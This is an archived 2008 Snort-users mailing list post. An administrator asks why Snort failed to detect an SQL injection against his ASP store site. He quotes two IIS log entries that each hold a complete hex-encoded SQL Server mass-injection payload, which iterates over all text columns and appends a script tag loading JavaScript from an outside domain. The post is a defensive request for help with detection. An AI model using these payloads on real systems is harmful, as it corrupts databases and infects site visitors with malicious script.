Snort mailing list archives
Undetected SQL Injection
From: "Curtis LaMasters" <curtislamasters () gmail com>
Date: Mon, 23 Jun 2008 14:15:33 -0500
I am running Snort 2.7 on my firewalls and have still somehow been SQL injected. I have the SQL rules, MySQL rules, IIS Rules, and a few more but it sill did not detect. Below I have part of the IIS log where the injection (attempt) was done. I was hopeing someone could shed some light on the problem. Please let me know if I need to provide any additional information. 2008-06-23 00:30:44 10.99.4.44 GET /com/store/content.asp ContentID=10;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E626E726164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D20546655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--|21|800a0d5d|Application_uses_a_value_of_the_wrong_type_for_the_current_operation. 80 - 201.208.89.82Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) 500 0 0 2008-06-23 01:23:24 10.99.4.44 GET /com/store/com_viewItem.asp idProduct=9;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E70696E676164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 59.178.127.68Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) 302 0 0 Curtis LaMasters http://www.curtis-lamasters.com http://www.builtnetworks.com
------------------------------------------------------------------------- Check out the new SourceForge.net Marketplace. It's the best place to buy or sell services for just about anything Open Source. http://sourceforge.net/services/buy/index.php
_______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Undetected SQL Injection Curtis LaMasters (Jun 23)
- Re: Undetected SQL Injection Joel Esler (Jun 23)
- Re: Undetected SQL Injection Patrik Nordlén (Jun 24)
- Re: Undetected SQL Injection Leon Ward (Jun 24)
- Re: Undetected SQL Injection Joel Esler (Jun 24)
- Re: Undetected SQL Injection Patrik Nordlén (Jun 24)
- Re: Undetected SQL Injection Joel Esler (Jun 23)
- Message not available
- Re: Undetected SQL Injection Curtis LaMasters (Jun 24)
- <Possible follow-ups>
- Re: Undetected SQL Injection Jason Haar (Jun 23)